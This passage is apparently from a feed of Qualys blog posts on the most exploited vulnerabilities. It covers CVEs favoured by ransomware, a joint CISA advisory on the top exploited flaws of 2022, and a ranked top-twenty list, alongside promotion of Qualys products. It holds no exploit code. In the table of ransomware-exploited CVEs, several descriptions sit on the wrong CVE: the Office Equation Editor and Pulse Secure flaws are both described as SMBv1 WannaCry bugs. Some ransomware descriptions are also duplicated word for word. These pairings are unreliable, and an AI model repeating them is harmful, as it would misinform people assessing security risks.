ransomware gang claimed responsibility. This same group alleges to be behind the data theft attack on Reddit.\n\n[![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-6-Top-10-Vulnerabilities-Exploited-by-Ransomware-1070x274.png)](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-6-Top-10-Vulnerabilities-Exploited-by-Ransomware.png>)Fig 6. Top Ten Vulnerabilities Exploited by Ransomware for High-Risk Vulnerabilities\n\n**Title** | **CVEs** | **Ransomware Count** | **TruRisk** **Score (QVS)** | **Description** \n---|---|---|---|--- \nMicrosoft Office Equation Editor Remote Code Execution Vulnerability | CVE-2017-11882 | 14 | 100 | Allows an unauthenticated attacker to exploit the vulnerability in SMBv1 to completely compromise systems. It was used by the [WannaCry crypto worm](<https://en.wikipedia.org/wiki/WannaCry_ransomware_attack>) as part of a worldwide cyberattack. \nJava AtomicReferenceArray deserialization RCE | CVE-2012-0507 | 42 | 100 | Exploits the vulnerability in JRE to download and install files of an attacker\u2019s choice onto the system by tricking the user to visit a malicious link. Old CVE, but still relevant. \nJava Applet Field Bytecode Verifier Cache RCE | CVE-2012-1723 | 13 | 100 | Exploits the vulnerability in JRE to download and install files of an attacker\u2019s choice onto the system. \nWindows SMB v1 Remote Code Execution (WannaCry) | CVE-2017-0145 | 13 | 100 | Allows an unauthenticated, remote attacker to read arbitrary files allowing the attacker to access private keys or user/password information, which is then used to gain further unauthorized access. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34473 | 12 | 100 | Allows an unauthenticated user to run arbitrary commands on the exchange server. It Can be chained with other CVE\u2019s CVE-2021-34523 and CVE-2021-31207 making it more attractive to cybercriminals. \nPulse Connect Secure SSL VPN Vulnerability | CVE-2019-11510 | 12 | 100 | Allows an unauthenticated attacker to exploit the vulnerability in SMBv1 that completely compromises systems. It was leveraged by the WannaCry crypto worm as part of a worldwide cyberattack. \nWindows SMB v1 Remote Code Execution (WannaCry) | CVE-2017-0144 | 12 | 95 | Allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It lets the attacker instantly become an admin on enterprise networks. \nMicrosoft Windows Netlogon Privilege Escalation (ZeroLogon) | CVE-2020-1472 | 11 | 93 | Allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It lets the attacker instantly become an admin on enterprise networks. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34523 | 10 | 100 | Allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. \nIt lets the attacker instantly become an admin on enterprise networks. \nCitrix Application Delivery Controller/NetScaler RCE | CVE-2019-19781 | 10 | 100 | Allows an unauthenticated attacker to execute arbitrary code on the system. Was leveraged to drop NOTROBIN malware to maintain persistent access. \n \nTable 5. Top 10 Vulnerabilities Exploited by Ransomware for High-Risk Vulnerabilities\n\n[![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-7-Most-Active-Ransomwares-1070x312.png)](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-7-Most-Active-Ransomwares.png>)Fig 7. Most Active Ransomware for High-Risk Vulnerabilities\n\n**Ransomware** | **CVEs** **Count** | **Description** \n---|---|--- \n**Conti** | 30 | "Conti" is a Ransomware-as-a-Service (RaaS) targeting corporations and agencies by stealing and threatening to publish their sensitive data unless a ransom is paid. It uses unique encryption keys for each file and victim and leverages the Windows Restart Manager to unlock files for encryption. \n**Cerber** | 30 | This modular ransomware can spread through email attachments, exploit kits, and drive-by downloads. It encrypts files and demands a ransom payment in Bitcoin. \n**REvil** | 25 | This modular ransomware can spread through email attachments, exploit kits, and drive-by downloads. It encrypts files and demands a ransom payment in Bitcoin. \n**Sodinokibi** | 21 | A successor to REvil that is even more sophisticated. It can encrypt files on all types of devices, including servers, laptops, and mobile phones. \n**Lucky** | 21 | This ransomware is known for its aggressive spam campaigns. It sends emails with malicious attachments that, when opened, infect the victim's computer with ransomware. \n**GandCrab** | 19 | This ransomware is known for its high ransom demands. It has targeted businesses in various industries, including healthcare, finance, and manufacturing. \n**Ryuk** | 17 | This ransomware is known for its high ransom demands. It has targeted businesses in various industries, including healthcare, finance, and manufacturing. \n**Reveton** | 16 | Known for its scareware tactics, this ransomware displays a fake warning message claiming the victim's computer has been infected with malware. The message demands that the victim pay a ransom to remove the malware. \n**STOP** | 15 | Ransomware operators are known to be aggressive and persistent, often threatening to release stolen data or to attack systems again if the ransom is not paid. \n**Satan** | 15 | Satan ransomware can be very high, and there is no guarantee that victims will get their data back even if they pay the ransom. Used in attacks against high-profile organizations, healthcare, education, government, and businesses of all sizes. \n \nTable 6. Most Active Ransomware for High-Risk Vulnerabilities\n\n## Prioritizing Exploited Vulnerabilities with The Qualys VMDR and TruRisk\n\nOftentimes, malicious actors frequently target diverse sets of vulnerabilities to accomplish their objectives. As such, keeping track of who is exploiting what can be daunting, and it's certainly not an efficient use of the time for practitioners or security & risk management leaders.\n\nHence, **The Qualys VMDR with TruRisk** facilitates this process, substantially simplifying the prioritization process by translating the risk associated with vulnerabilities, assets, and asset groups into an easily understandable score that both technical and non-technical teams can comprehend this scoring system.\n\nWhen you carefully observe, each vulnerability mentioned above has a TruRisk Score (QVS) of over 90. TruRisk considers these factors daily, consistently assigning a score higher than 90.\n\nSo, from a prioritization standpoint, any issue with a score of 90 or above should be immediately prioritized and remedied.\n\nLet\u2019s take CVE-2017-11882 as an example. The TruRisk score clearly indicates why this is a high-risk vulnerability, with more than 400 malware and 50 threat actors exploiting it, and **we see evidence of exploitation as recently as July 16th, 2023, for a 6-year-old vulnerability. **\n\n[![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-8-Microsoft-Office-Memory-Corruption-Vulnerability_-CVE-2017-11882-1070x1255.jpg)](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-8-Microsoft-Office-Memory-Corruption-Vulnerability_-CVE-2017-11882.jpg>)\n\nFig 8. Microsoft Office Memory Corruption Vulnerability: CVE-2017-11882\n\n## Assess Your Organizations Exposure to Risk / TruRisk Dashboard\n\nThe Qualys VMDR helps organizations get instant visibility into high-risk vulnerabilities, especially those exploited in the wild.\n\n[![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-9-1-1070x737.jpg)](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-9-1.jpg>)\n\nFig 9. Qualys VMDR TruRisk Dashboard for High-Risk Vulnerabilities\n\nThe fastest method to gain insights into your TruRisk is by downloading and importing the TruRisk Dashboard into your VMDR subscription.\n\nThe TruRisk VMDR Dashboard is available \u2013 [Download the Dashboard Here](<https://blog.qualys.com/wp-content/uploads/2023/07/Qualys_VMDR_TruRisk__UDDashboard.zip>)\n\nAnd once you have the visibility patch with Qualys Patch management instantly reduce the risk.\n\n## Key Insights & Takeaways\n\n * The time to Known Exploited Vulnerability (KEV) is down to eight days for CVEs published in 2023. Defenders should leverage automation to patch high-risk vulnerabilities.\n * CVE-2017-11882 stands out as the pinnacle among CVEs in its exploitation by malware, threat actors, and ransomware groups. With over 400 malware, 50 threat actors, and 14 ransomware groups taking advantage of this vulnerability, it will likely be remembered as the most cherished attacker CVE ever.\n * Attackers prominently exploit vulnerabilities in popular applications such as Microsoft Office, Microsoft Exchange, Windows Operating systems, Java, Pulse Secure SSL VPN, and Citrix ADC/NetScaler. Attackers seek these applications** primarily due to their widespread usage and potential for exploiting security weaknesses.**\n * Organizations should leverage threat intelligence to prioritize vulnerabilities that reduce the risk of exploitation.\n * The Qualys VMDR with TruRisk automatically prioritizes vulnerabilities exploited in the wild with a **TruRisk score of 90 or higher,** greatly simplifying the prioritization process.\n\nConcluding this series in the next blog we will discuss the _**15 most exploited vulnerabilitie**_**_s ever_**.\n\nWatch out for our next blog.\n\n## References\n\n * <https://blog.qualys.com/product-tech/2023/07/11/an-in-depth-look-at-the-latest-vulnerability-threat-landscape-part-1>\n * <https://blog.qualys.com/qualys-insights/2022/10/10/in-depth-look-into-data-driven-science-behind-qualys-trurisk>\n * <https://blog.qualys.com/vulnerabilities-threat-research/2022/12/16/implement-risk-based-vulnerability-management-with-qualys-trurisk-part-2>\n * <https://blog.qualys.com/qualys-insights/2022/08/08/a-deep-dive-into-vmdr-2-0-with-qualys-trurisk>\n\n## Additional Contributor\n\nShreya Salvi, Data Scientist, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-07-18T13:38:53", "type": "qualysblog", "title": "Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers\u2019 Edition)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2012-0507", "CVE-2012-1723", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2019-0903", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0601", "CVE-2020-1472", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-44228"], "modified": "2023-07-18T13:38:53", "id": "QUALYSBLOG:1D4C1F32168D08F694C602531AEBC9D9", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-24T19:24:47", "description": "A unified front against malicious cyber actors is climactic in the ever-evolving cybersecurity landscape. The joint Cybersecurity Advisory (CSA), a collaboration between leading cybersecurity agencies from the United States, Canada, United Kingdom, Australia, and New Zealand, is a critical guide to strengthen global cyber resilience. The agencies involved include the U.S.'s CISA, NSA, and FBI; Canada's CCCS; U.K.'s NCSC-UK; Australia's ACSC; and New Zealand's NCSC-NZ and CERT NZ. \n\nThis collaboration among key cybersecurity agencies highlights the global nature of cybersecurity threats. Such cooperative efforts signify a unified perspective and highlight the need for shared intelligence and coordinated strategies. The realization that cybersecurity is not limited to national borders but is a shared responsibility is growing more evident. \n\nThe CSA sheds light on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited in 2022 and the associated Common Weakness Enumeration(s) (CWE). It outlines crucial technical details and key findings, providing actionable guidance and mitigation strategies. Vendors, designers, developers, and end-user organizations are strongly urged to implement these guidelines to strengthen their defenses against possible threats. \n\n### **The Cybersecurity Advisory (CSA) has identified the following key findings that outline essential insights into the behaviors and tendencies of malicious cyber actors for 2022:** \n\n * **Older Vulnerabilities Targeted**: Malicious cyber actors exploited older software vulnerabilities more frequently, targeting unpatched, internet-facing systems. \n * **Proof of Concept (PoC) Code**: Public availability of PoC code likely facilitated broader exploitation by malicious actors. \n * **Success in First Two Years**: Known vulnerabilities are most successfully exploited within the first two years of disclosure. Timely patching reduces this effectiveness. \n * **Prioritization of Severe CVEs**: Cyber actors prioritize severe and globally prevalent vulnerabilities, seeking low-cost, high-impact tools and paying attention to vulnerabilities principal in specific targets' networks. \n * **Detection through Deep Packet Inspection**: Deep packet inspection can often detect exploits involving multiple CVE or CVE chains. \n\nIn 2022, malicious cyber actors routinely exploited 12 severe vulnerabilities, affecting various products and services. These issues included the long-exploited Fortinet SSL VPNs' CVE-2018-13379 and widespread vulnerabilities such as Apache's Log4Shell (CVE-2021-44228). They impacted multiple systems, from Microsoft Exchange email servers to Atlassian Confluence and software like Zoho ManageEngine and VMware. The exploitation often resulted from organizations' failure to patch software or due to publicly available proofs of concept (PoC), enabling remote execution, privilege escalation, and authentication bypass. The table below shows detailed information on these 12 vulnerabilities, along with Qualys-provided QIDs. A crucial commonality between these vulnerabilities is their potential to compromise system integrity, confidentiality, and availability severely. The Qualys Threat Research Unit (TRU) team has addressed all aforementioned critical vulnerabilities by providing QIDs within 24 hours. These critical vulnerabilities are categorized based on their potential impact if exploited as follows: \n\nCVE/Vuln Name| Vendor/Product| Type| QID| QDS \n---|---|---|---|--- \nCVE-2018-13379| Fortinet - FortiOS and FortiProxy | SSL VPN Credential Exposure | 43702| 100 \nCVE-2021-34473 (Proxy Shell) | Microsoft - Exchange Server | RCE | 50114, 50107| 100 \nCVE-2021-31207 (Proxy Shell) | Microsoft - Exchange Server | Security Feature Bypass | 50114, 50111| 95 \nCVE-2021-34523 (Proxy Shell) | Microsoft - Exchange Server | Elevation of Privilege | 50114, 50112| 100 \nCVE-2021-40539| Zoho ManageEngine - ADSelfService Plus | RCE/Authentication Bypass | 375840| 100 \nCVE-2021-26084| Atlassian - Confluence Server and Data Center | Arbitrary code execution | 375839, 730172| 100 \nCVE-2021-44228 (Log4Shell) | Apache - Log4j2 | RCE | 730447, 376521| 100 \nCVE-2022-22954| VMware - Workspace ONE Access and Identity Manager | RCE | 730447, 376521| 100 \nCVE-2022-22960| VMware - Workspace ONE Access, Identity Manager, and vRealize Automation | Improper Privilege Management | 376521| 95 \nCVE-2022-1388| F5 Networks - BIG-IP | Missing Authentication Vulnerability | 730489, 376577| 96 \nCVE-2022-30190 (Follina)| Microsoft - Multiple Products | RCE | 91909| 100 \nCVE-2022-26134| Atlassian - Confluence Server and Data Center | RCE | 376657, 730514| 100 \n \n**Vulnerabilities Paving the Way for Data Theft and More:** \n\nThe following vulnerabilities that could potentially lead to data theft or lay the groundwork for further attacks: \n\n * **CVE-2018-13379**, a flaw in the Fortinet FortiOS SSL VPN web portal, could be leveraged by attackers to gain unauthorized access to sensitive SSL VPN session data. \n * **CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207**, collectively known as ProxyShell vulnerabilities affecting Microsoft Exchange Servers, could enable bad actors to deploy web shells and execute arbitrary code on compromised devices. \n * **CVE-2022-1388**, an F5 BIG-IP iControl REST API vulnerability, could offer initial network access to cyber criminals, enabling infamous activities like data theft or ransomware deployment. \n\n**Vulnerabilities Leading to System Takeover:** \n\nNext, the following vulnerabilities that could potentially compromise an entire system: \n\n * **CVE-2021-44228**, or Log4Shell, exploits Apache's log4j Java library, possibly leading to a total system compromise. \n * **CVE-2021-26084 and CVE-2022-26134**, vulnerabilities found in Atlassian's Confluence Server and Data Center, can allow an attacker to execute arbitrary code, leading to a potential system takeover. \n * **CVE-2021-40539**, an issue with Zoho ManageEngine ADSelfService Plus, can allow for arbitrary code execution and potential system compromise. \n * **CVE-2022-30190**, found in the Microsoft Support Diagnostic Tool, can be exploited for remote code execution, potentially leading to full system compromise. \n * **CVE-2022-22954 and CVE-2022-22960**, affecting VMware Workspace ONE Access, Identity Manager, and vRealize Automation, can allow for remote code execution and privilege escalation, respectively, potentially leading to full system compromise. \n\n### **Analyzing Vulnerability Remediation Patterns and the Urgency of Swift Patching**\n\nOur data, which sheds light on the patching behavior for 12 significant vulnerabilities, is pulled from the Qualys TruRisk Platform. This data is anonymized to ensure that any data analysis cannot revert to identifying specific organization or asset information. \n\nThe data highlights a prominent challenge where some vulnerabilities witness rapid mitigation, highlighting proactive security measures. In contrast, others face prolonged remediation times, raising concerns about potential exposure risks. Such disparities underline the importance of detecting and swiftly addressing vulnerabilities. As cyber threats grow in sophistication, the urgency to patch quickly and efficiently becomes paramount. The following plot contrasting the patch rates and remediation times for 12 frequently exploited vulnerabilities in 2022 further illustrates this point. It shows that while some vulnerabilities are quickly patched, others remain unaddressed for extended periods. This analysis reinforces the importance of timely vulnerability management and the pressing need to do so with speed and diligence, especially for high-risk vulnerabilities. \n\n![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/08/NSA_final-1070x644.png)\n\nFig 1. Patch Rate vs. Average Remediation Days for Top 12 Routinely Exploited Vulnerabilities in 2022 \n\nThe damaging potential of these vulnerabilities highlights the vital importance of cybersecurity alertness. By understanding the risks and possible impacts of these threats, organizations can adopt proactive defense strategies, patching vulnerabilities and updating systems regularly to ensure the integrity of their environments. The advisory also emphasizes the criticality of accurately incorporating the CWE field in published CVEs to highlight vulnerability root causes and support industry-wide software security insights. \n\n### **Aligning Qualys Platform with Joint Cybersecurity Advisory Mitigating Guidelines** \n\nThe recent joint Cybersecurity Advisory (CSA) emphasizes the urgency of identifying exploited vulnerabilities, keeping all network assets updated, and implementing a robust patch management process. Among the recommendations are the timely updating of software, prioritizing patches for known vulnerabilities, performing automated asset discovery, and implementing centralized patch management. \n\nQualys' suite of products directly aligns with these critical recommendations. Qualys Cybersecurity Asset Management (CSAM) ensures 360-degree visibility of assets, aligning with CSA's call for comprehensive asset discovery. Qualys Patch Management offers an advanced automated solution for timely updates, while Qualys VMDR facilitates the discovery, assessment, and prioritization of vulnerabilities. By leveraging Qualys' unified platform, organizations can efficiently adhere to international best practices outlined in the CSA, enhancing their defense against cyber threats. \n\nIn addition, the joint Cybersecurity Advisory (CSA) stresses the need for robust protective controls and architecture. Key recommendations include securing internet-facing network devices, continuously monitoring the attack surface, and prioritizing secure-by-default configurations. There is a strong focus on hardening network protocols, managing access controls, and employing security tools such as EDR and SIEM for enhanced protection. \n\nQualys Threat Protection aligns seamlessly with these recommendations by providing centralized control and comprehensive visibility of the threat landscape. By continuously correlating external threat information against vulnerabilities and the IT asset inventory, Qualys allows organizations to pinpoint and prioritize the most critical security threats. Whether managing vulnerabilities, controlling the threat prioritization process, or ensuring compliance with regulations, Qualys empowers organizations to align with the CSA's guidelines and achieve a fortified security posture. \n\nQualys TotalCloud also employs deep learning AI to continuously monitor the attack surface and investigate abnormal activity, aligning with CSA guidelines. It is leveraging an interconnected artificial neural network that detects known and unknown malware with over 99% accuracy in less than a second. Through these capabilities, Qualys TotalCloud delivers an advanced, rapid, and precise solution for malware detection in multi-cloud environments and bypassing the limitations of signature-based systems. \n\n![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/08/NSA_2-1070x370.jpg)\n\nFig 2. Qualys VMDR TruRisk Dashboard for top 12 routinely exploited vulnerabilities in 2022 \n\nThe [Qualys VMDR TruRisk Dashboard](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/08/Qualys-VMDR-TruRisk-UDdashboard.json_.zip>) (JSON zipped) helps organizations to have complete visibility into open vulnerabilities that focus on the organization\u2019s global risk score, high-risk vulnerabilities, and Top Exploited Vulnerabilities. Once you identify the vulnerable assets for these top vulnerable CVEs prioritized among your remediation owners, you can instantly use Qualys Patch management to reduce the risk. \n\nIn conclusion, this Cybersecurity Advisory (CSA) offers valuable insights and mitigation strategies against routine vulnerabilities. Qualys provides robust solutions that align seamlessly with CSA's recommendations, including asset management, timely updates, vulnerability prioritization, and advanced threat detection capabilities in this growing landscape. Consequently, organizations can strengthen their defenses against cyber threats by sticking to CSA guidelines and leveraging comprehensive cybersecurity solutions like Qualys'. \n\n## References\n\n[CISA, NSA, FBI and International Partners Issue Advisory on the Top Routinely Exploited Vulnerabilities in 2022](<https://media.defense.gov/2023/Aug/03/2003273618/-1/-1/0/JOINT-CSA-2022-TOP-ROUTINELY-EXPLOITED-VULNERABILITIES.PDF>)\n\n## Additional Contributor \n\n * Ramesh Ramachandran, Principal Product Manager, Qualys\n * Aubrey Perin, Lead Threat Intelligence Analyst, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-08-24T19:07:05", "type": "qualysblog", "title": "Qualys Tackles 2022\u2019s Top Routinely Exploited Cyber Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26084", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22960", "CVE-2022-26134", "CVE-2022-30190"], "modified": "2023-08-24T19:07:05", "id": "QUALYSBLOG:56A00F45A170AF95CF38191399649A4C", "href": "https://blog.qualys.com/category/qualys-insights", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-28T12:37:03", "description": "The earlier blog posts showcased an overview of the **vulnerability threat landscape** that is either remotely exploited or most targeted by attackers._ _A quick recap \u2013 We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.\n\nThis blog post will focus on **Qualys\u2019 Top Twenty Vulnerabilities, **targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the current year.\n\nSome of these vulnerabilities are part of the recent [**CISA Joint Cybersecurity Advisory (CSA)**](<https://www.cisa.gov/news-events/alerts/2023/08/03/cisa-nsa-fbi-and-international-partners-release-joint-csa-top-routinely-exploited-vulnerabilities>)**,** published on August 3, 2023; you can access it from [**2022 Top Routinely Exploited Vulnerabilities**](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a>)**.**\n\nRead on- \n\n## Stats on the Top 20 Vulnerable Vendors & By-Products\n\n![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/08/Fig-1.-Top-20-Vulnerable-Vendor-1070x694.png)**Fig 1. Top Vulnerable Vendor**\n\n![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/08/Fig-2.-Top-20-Vulnerable-Products-1070x708.png)**Fig 2. Top Vulnerable Products**\n\n## Top Twenty Most Targeted by Attackers\n\n### **1. CVE-2017-11882: Microsoft Office Memory Corruption Vulnerability**\n\n**Vulnerability Trending Over Years: 2018, 2020, 2021, 2022, 2023 (79 times)**\n\nIt was exploited by 467 Malware, 53 Threat Actors, and 14 Ransomware and was trending in the wild as recently as August 31, 2023. \n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\n**Qualys Vulnerability Detection (QID): 110308**\n\nDisclosed in 2017, CVE-2017-11882 is a **significant memory corruption vulnerability** in Microsoft Office's Equation Editor. It could enable an attacker to execute arbitrary code under the current user's permissions. \n\nIf the user has administrative rights, the attacker could gain complete control of the system, install programs, alter data, or create new user accounts with full privileges. This vulnerability will be exploited if the user opens a specially crafted file, potentially sent via email or hosted on a compromised website.\n\nIt\u2019s been primarily exploited in various cyber-attacks and espionage campaigns.\n\n### 2\\. **CVE-2017-0199: Microsoft Wordpad Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2017, 2020, 2021, 2023 (59 times)**\n\nIt was exploited by 93 Malware, 53 Threat Actors, and 5 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 110297**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2017-0199 is a notable remote code execution vulnerability that affects specific Microsoft Office and WordPad versions precisely when they parse specially crafted files. This vulnerability is the most favored vulnerability by malware, threat actors, and ransomware. \n\nIf successfully exploited, an attacker could execute arbitrary code in the current user's security context, potentially taking control of the system. Exploitation involves a user opening or previewing a maliciously crafted file, often sent via email. Microsoft has addressed this vulnerability by correcting how Office and WordPad parse these files and by enabling certain API functionality in Windows for further resolution.\n\n### 3\\. **CVE-2012-0158: Vulnerability in Windows Common Controls Could Allow RCE**\n\n**Vulnerability Trending Over Years: 2013, 2020, 2021, 2023 (33 times)**\n\nIt was exploited by 63 Malware, 45 Threat Actors, 2 Ransomware and was trending in the wild as recently as August 31, 2023.\n\n**Qualys Vulnerability Detection (QID): 90793**\n\nCVE-2012-0158 is a substantial remote code execution vulnerability in Windows standard controls. An attacker can exploit the flaw by constructing a specially crafted webpage. Upon viewing this webpage, the vulnerability can allow remote code execution, potentially granting the attacker the same rights as the logged-on user. \n\nIf the user has administrative privileges, this could mean total control of the affected system. Disclosed in 2012, this vulnerability has been notably exploited in various cyber-attacks, enabling attackers to install programs, manipulate data, or create new accounts with full user rights.\n\n### 4\\. **CVE-2017-8570: Microsoft Office Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2018, 2020, 2023 (25 times)**\n\nIt was exploited by 52 Malware 11 Threat Actors and was trending in the wild as recently as September 2, 2023\n\n**Qualys Vulnerability Detection (QID): 110300**\n\nCVE-2017-8570 is a significant remote code execution vulnerability in Microsoft Office and WordPad. It involves the way these applications handle specially crafted files. It can be exploited by an attacker who convinces a user to open a specially designed file, potentially allowing the attacker to run arbitrary code on the victim's machine with the same privileges as the logged-in user and serving as a downloader to other high-profile malware.\n\n### 5\\. **CVE-2020-1472: Zerologon - An Unauthenticated Privilege Escalation to Full Domain Privileges**\n\n**Vulnerability Trending Over Years: 2020, 2021, 2022, 2023 (56 times)**\n\nIt was exploited by 18 Malware, 16 Threat Actors, 11 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID):** **91680**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier. **\n\nCVE-2020-1472, or **Zerologon, is a severe vulnerability in Microsoft's Netlogon Remote Protocol** due to a flawed implementation of AES-CFB8 encryption.\n\nUsing a fixed initialization vector and accepting unencrypted sessions allows an attacker to impersonate a server and compromise the entire Windows domain. The attacker takes control over all the Active Directory identity services.\n\n### 6\\. **CVE-2017-0144, CVE-2017-0145, CVE-2017-0143: Windows SMBv1 Remote Code Execution Vulnerability WannaCry, Petya**\n\n**Vulnerability Trending Over Years: 2017, 2020, 2021, 2023 (50 times)**\n\nIt was exploited by 12 Malware, 10 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 1, 2023.\n\n**Qualys Vulnerability Detection (QID): 91361, 91360, 91359, 91345**\n\nCommonly known as Shadow Broker or MS17-010, or "ETERNALBLUE," or "ETERNALSYNERGY" or "ETERNAL ROMANCE" is a remote code execution vulnerability in Microsoft's Server Message Block 1.0 (SMBv1) protocol.\n\nThe vulnerability arises from how SMBv1 handles specific requests, allowing an attacker(usually authenticated) to send a specially crafted packet to an SMBv1 server, enabling them to execute code on the target server.\n\nIt was infamously exploited in the widespread WannaCry ransomware attack in 2017, leading to global data encryption and ransom demands.\n\n### 7\\. **CVE-2012-1723: Java Applet Field Bytecode Verifier Cache Remote Code Execution**\n\n**Vulnerability Trending Over Years: 2023 (6 times)**\n\nIt was exploited by 91 Malware, 8 Threat Actors, 41 Ransomware and was trending in the wild as recently as August 17, 2023.\n\n**Qualys Vulnerability Detection (QID): 120274**\n\nCVE-2012-1723 is a substantial vulnerability found in the Java Runtime Environment. It can be exploited through a malicious web page, hosting a rogue Java applet can be exploited through a malicious web page hosting rogue Java applet.\n\nThe issue, originating from a type-confusion error in the "HotSpot" component, allows untrusted Java applets or applications to bypass the Java sandbox security restrictions and execute arbitrary code on a user's system\n\n### 8\\. **CVE-2021-34473, CVE-2021-34523, CVE-2021-31207: Microsoft Exchange Server RCE (ProxyShell)**\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (39 times)**\n\nIt was exploited by 12 Malware, 20 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 50114, 50111, 50112**\n\n**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier. **\n\nProxyShell, a chain of vulnerabilities that impacts on-premises Microsoft Exchange Servers, is widely used for email and associated services globally.\n\nThese vulnerabilities exist in the Microsoft Client Access Service (CAS), typically running on port 443 in IIS, often exposed to the internet to allow users to access their email remotely. This exposure has led to widespread exploitation by threat actors deploying web shells to execute arbitrary code on compromised devices. They allow an actor to bypass authentication and execute code as a privileged user.\n\n### 9\\. **CVE-2019-11510: Pulse Secure Pulse Connect Secure SSL VPN Unauthenticated Path**\n\n**Vulnerability Trending Over Years: 2019, 2020, 2023 (53 times)**\n\nIt was exploited by 13 Malware, 18 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 38771**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2019-11510 is a critical vulnerability found in Pulse Connect Secure, a widely used VPN solution by Pulse Secure. The flaw enables an unauthenticated, remote attacker to exploit a specific endpoint and read arbitrary files on the system, including sensitive information such as private keys and user credentials.\n\nDue to its severity, It can provide an attacker with similar access to the corporate network as a legitimate user.\n\n### 10\\. **CVE-2021-44228: Apache Log4j Remote Code Execution 